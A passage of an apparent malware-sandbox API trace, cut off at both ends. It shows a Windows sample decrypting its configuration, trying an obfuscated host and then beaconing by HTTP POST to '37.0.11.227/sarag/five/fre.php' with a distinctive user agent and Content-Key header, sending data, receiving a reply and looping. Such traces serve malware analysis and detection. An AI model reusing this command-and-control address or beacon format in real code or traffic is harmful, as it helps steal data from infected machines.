returned 0x76b70000 [0285.448] CryptDestroyKey (hKey=0x69d628) returned 1 [0285.448] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.449] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0285.449] GetProcessHeap () returned 0x690000 [0285.449] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0285.449] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0285.449] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0285.450] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0285.450] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0285.451] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0285.451] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0285.452] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0285.452] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0285.452] GetProcessHeap () returned 0x690000 [0285.452] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0285.452] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0285.453] GetProcessHeap () returned 0x690000 [0285.453] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0285.453] GetProcessHeap () returned 0x690000 [0285.453] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0285.454] GetProcessHeap () returned 0x690000 [0285.454] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0285.454] GetProcessHeap () returned 0x690000 [0285.454] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0285.455] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.456] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0285.470] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.470] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0285.476] GetProcessHeap () returned 0x690000 [0285.476] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0285.477] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.477] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0285.478] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.478] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0285.479] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.482] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0285.482] GetProcessHeap () returned 0x690000 [0285.483] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0285.483] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.484] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0285.484] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.485] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0285.485] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.485] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0285.485] GetProcessHeap () returned 0x690000 [0285.485] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0285.486] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0285.486] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0285.487] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0285.487] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0285.488] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0285.488] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0285.489] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0285.489] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0285.489] GetProcessHeap () returned 0x690000 [0285.489] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0285.489] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0285.489] GetProcessHeap () returned 0x690000 [0285.489] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4f0 [0285.489] socket (af=2, type=1, protocol=6) returned 0x914 [0285.489] connect (s=0x914, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0285.520] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0285.520] GetProcessHeap () returned 0x690000 [0285.520] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0285.520] GetProcessHeap () returned 0x690000 [0285.520] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0285.521] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0285.522] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0285.522] GetProcessHeap () returned 0x690000 [0285.522] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b01c0 [0285.522] GetProcessHeap () returned 0x690000 [0285.522] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0285.522] GetProcessHeap () returned 0x690000 [0285.522] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4460 [0285.522] GetProcessHeap () returned 0x690000 [0285.522] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0285.523] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0285.524] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0285.524] GetProcessHeap () returned 0x690000 [0285.524] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0285.524] GetProcessHeap () returned 0x690000 [0285.524] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0285.524] send (s=0x914, buf=0x6ad508*, len=242, flags=0) returned 242 [0285.525] send (s=0x914, buf=0x6aba40*, len=159, flags=0) returned 159 [0285.525] GetProcessHeap () returned 0x690000 [0285.525] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0285.525] recv (in: s=0x914, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0285.607] GetProcessHeap () returned 0x690000 [0285.607] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0285.607] GetProcessHeap () returned 0x690000 [0285.608] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0285.609] GetProcessHeap () returned 0x690000 [0285.609] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b01c0 | out: hHeap=0x690000) returned 1 [0285.609] GetProcessHeap () returned 0x690000 [0285.609] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0285.609] closesocket (s=0x914) returned 0 [0285.610] GetProcessHeap () returned 0x690000 [0285.610] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4f0 | out: hHeap=0x690000) returned 1 [0285.610] GetProcessHeap () returned 0x690000 [0285.610] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0285.611] GetProcessHeap () returned 0x690000 [0285.611] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0285.611] GetProcessHeap () returned 0x690000 [0285.612] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0285.612] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1740) returned 0x914 [0285.613] Sleep (dwMilliseconds=0xea60) [0285.615] GetProcessHeap () returned 0x690000 [0285.615] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0285.615] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.615] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0285.620] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.620] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0285.631] GetProcessHeap () returned 0x690000 [0285.631] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0285.640] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.640] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0285.641] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.641] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0285.642] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.642] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0285.642] GetProcessHeap () returned 0x690000 [0285.643] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0285.645] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.646] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0285.651] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.652] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0285.653] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.653] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0285.653] GetProcessHeap () returned 0x690000 [0285.653] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0285.654] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0285.654] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0285.655] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0285.656] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0285.657] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0285.657] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0285.666] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0285.666] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0285.666] GetProcessHeap () returned 0x690000 [0285.666] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0285.666] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0285.666] GetProcessHeap () returned 0x690000 [0285.667] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0285.667] GetProcessHeap () returned 0x690000 [0285.667] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0285.667] GetProcessHeap () returned 0x690000 [0285.667] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0285.667] GetProcessHeap () returned 0x690000 [0285.667] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0285.668] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.668] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0285.674] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.674] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0285.679] GetProcessHeap () returned 0x690000 [0285.680] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0285.682] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.682] CryptImportKey (in: hProv=0x6af188, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0285.683] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.683] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0285.684] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.684] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0285.684] GetProcessHeap () returned 0x690000 [0285.684] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0285.685] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.685] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0285.686] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.686] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0285.687] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.687] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0285.687] GetProcessHeap () returned 0x690000 [0285.687] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0285.687] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0285.688] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0285.688] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0285.689] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0285.689] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0285.689] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0285.690] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0285.690] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0285.690] GetProcessHeap () returned 0x690000 [0285.690] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0285.690] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0285.690] GetProcessHeap () returned 0x690000 [0285.690] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3c0 [0285.691] socket (af=2, type=1, protocol=6) returned 0x918 [0285.693] connect (s=0x918, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0285.717] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0285.717] GetProcessHeap () returned 0x690000 [0285.717] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeee0 [0285.718] GetProcessHeap () returned 0x690000 [0285.718] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0285.718] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0285.719] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0285.719] GetProcessHeap () returned 0x690000 [0285.719] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afd40 [0285.719] GetProcessHeap () returned 0x690000 [0285.719] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0285.720] GetProcessHeap () returned 0x690000 [0285.720] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0285.720] GetProcessHeap () returned 0x690000 [0285.720] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0285.720] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0285.721] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0285.721] GetProcessHeap () returned 0x690000 [0285.721] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0285.721] GetProcessHeap () returned 0x690000 [0285.722] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0285.722] send (s=0x918, buf=0x6ad508*, len=242, flags=0) returned 242 [0285.723] send (s=0x918, buf=0x6aba40*, len=159, flags=0) returned 159 [0285.723] GetProcessHeap () returned 0x690000 [0285.723] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0285.723] recv (in: s=0x918, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0285.808] GetProcessHeap () returned 0x690000 [0285.809] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0285.809] GetProcessHeap () returned 0x690000 [0285.809] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0285.810] GetProcessHeap () returned 0x690000 [0285.811] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afd40 | out: hHeap=0x690000) returned 1 [0285.811] GetProcessHeap () returned 0x690000 [0285.811] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeee0 | out: hHeap=0x690000) returned 1 [0285.812] closesocket (s=0x918) returned 0 [0285.812] GetProcessHeap () returned 0x690000 [0285.812] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3c0 | out: hHeap=0x690000) returned 1 [0285.813] GetProcessHeap () returned 0x690000 [0285.813] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0285.815] GetProcessHeap () returned 0x690000 [0285.816] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0285.816] GetProcessHeap () returned 0x690000 [0285.816] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0285.816] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x174c) returned 0x918 [0285.822] Sleep (dwMilliseconds=0xea60) [0285.826] GetProcessHeap () returned 0x690000 [0285.827] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0285.827] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.828] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0285.835] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.836] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0285.844] GetProcessHeap () returned 0x690000 [0285.844] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0285.847] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.848] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0285.855] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.855] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0285.858] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.858] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0285.858] GetProcessHeap () returned 0x690000 [0285.859] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0285.860] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.860] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0285.861] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.861] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0285.862] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.862] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0285.862] GetProcessHeap () returned 0x690000 [0285.862] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0285.863] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0285.864] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0285.864] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0285.865] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0285.865] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0285.866] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0285.866] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0285.867] 